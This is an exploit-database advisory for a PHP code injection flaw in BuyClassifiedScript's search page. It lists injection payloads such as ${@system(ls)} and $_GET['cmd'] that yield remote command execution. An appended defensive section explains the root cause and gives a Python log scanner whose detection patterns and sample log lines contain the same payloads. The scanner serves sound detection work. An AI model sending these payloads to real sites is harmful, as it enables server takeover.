BuyClassifiedScript - PHP Code Injection



EKU-ID: 28395 CVE: OSVDB-87875 OSVDB-ID:
Author: d3b4g Published: 2012-11-26 Verified: Verified


# Exploit Title: buyclassifiedscript PHP code injection vulnerability
# Date: 25.11.201
# Exploit Author: d3b4g
# Vendor Homepage: http://buyclassifiedscript.com/
# Tested on: Windows 7
# Blog: d3b4g.me




----------------------------------------------------------------------------------

     This vulnerability allows an attacker to inject custom PHP code
     into the server-side scripting engine. It is possible to obtain remote command
     execution by taking advantage of this vulnerability.


     Vulnerable function:

     /search/


     (1) PHP code execution:


     http://localhost/path/search {Inject malicious code}


     (2) Example of code you can inject:


        ${@system(ls)}

        ${@print(hello)}

        $_GET['cmd']
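The payloads above only reach the PHP engine when the value of the search parameter is interpolated into code that is later evaluated, so the durable fix is in the application itself: request data must never be placed into a string handed to eval() or into a double-quoted string that PHP re-evaluates. Until a patched release is deployed, the same payload shapes are easy to spot in web server logs. The script below is an added detection example written for this page, not code from the advisory author or from the BuyClassifiedScript vendor. It assumes Apache/Nginx "combined" log format and a search endpoint whose path ends in /search (the advisory shows /path/search); the log lines, the client addresses and the indicator regular expressions are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines in Apache/Nginx "combined" format.
# Addresses are documentation ranges; nothing here is real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [26/Nov/2012:10:15:01 +0000] "GET /search?q=used+bikes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.77 - - [26/Nov/2012:10:15:09 +0000] "GET /search?q=%24%7B%40system%28ls%29%7D HTTP/1.1" 200 4870 "-" "curl/7.21"
203.0.113.77 - - [26/Nov/2012:10:15:12 +0000] "GET /search?q=%24%7B%40print%28hello%29%7D HTTP/1.1" 200 4870 "-" "curl/7.21"
203.0.113.77 - - [26/Nov/2012:10:15:20 +0000] "GET /search?q=%24_GET%5B%27cmd%27%5D&cmd=id HTTP/1.1" 200 4870 "-" "curl/7.21"
198.51.100.5 - - [26/Nov/2012:10:16:00 +0000] "GET /listing/42 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.5 - - [26/Nov/2012:10:16:05 +0000] "GET /search?q=cheap+%24100+phones HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of PHP code-injection attempts, most specific first. Each one is
# tried against the URL-decoded value of every query parameter (assumed list).
INDICATORS = [
    ("php-exec-call",      re.compile(r'@?\b(system|exec|shell_exec|passthru|popen|eval)\s*\(')),
    ("php-superglobal",    re.compile(r'\$_(GET|POST|REQUEST|COOKIE|SERVER)\b')),
    ("php-complex-interp", re.compile(r'\$\{')),   # ${...} interpolation syntax
]


def decode_query(target):
    """Return {param: [values]} for a request target, URL-decoded.

    parse_qs already decodes one level; the extra unquote_plus catches a
    payload that was percent-encoded twice to slip past a naive filter."""
    query = urlsplit(target).query
    return {
        param: [unquote_plus(v) for v in values]
        for param, values in parse_qs(query, keep_blank_values=True).items()
    }


def find_injection_attempts(log_text, watched_path="/search"):
    """Scan log lines for requests to the search endpoint whose parameters
    carry a PHP code-injection indicator. Returns one finding per matching
    parameter value, in log order."""
    wanted = watched_path.rstrip("/")
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        target = m.group("target")
        if not urlsplit(target).path.rstrip("/").endswith(wanted):
            continue
        for param, values in decode_query(target).items():
            for value in values:
                for name, rx in INDICATORS:
                    if rx.search(value):
                        hits.append({
                            "ip": m.group("ip"),
                            "ts": m.group("ts"),
                            "param": param,
                            "indicator": name,
                            "value": value,
                        })
                        break  # one finding per value is enough
    return hits


def summarize_by_ip(hits):
    """Count findings per client address, useful for blocking or triage."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    findings = find_injection_attempts(SAMPLE_LOG)
    for h in findings:
        print(f'{h["ts"]} {h["ip"]} {h["param"]}={h["value"]!r} [{h["indicator"]}]')
    print("per-client totals:", summarize_by_ip(findings))
```

The benign sixth line (a search for "cheap $100 phones") is deliberately included: a dollar sign alone is normal in a classifieds search, so the indicators key on `${`, superglobal names and execution-function calls rather than on `$` by itself. Decoding happens before matching because every payload on this page arrives percent-encoded in the query string.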



-end-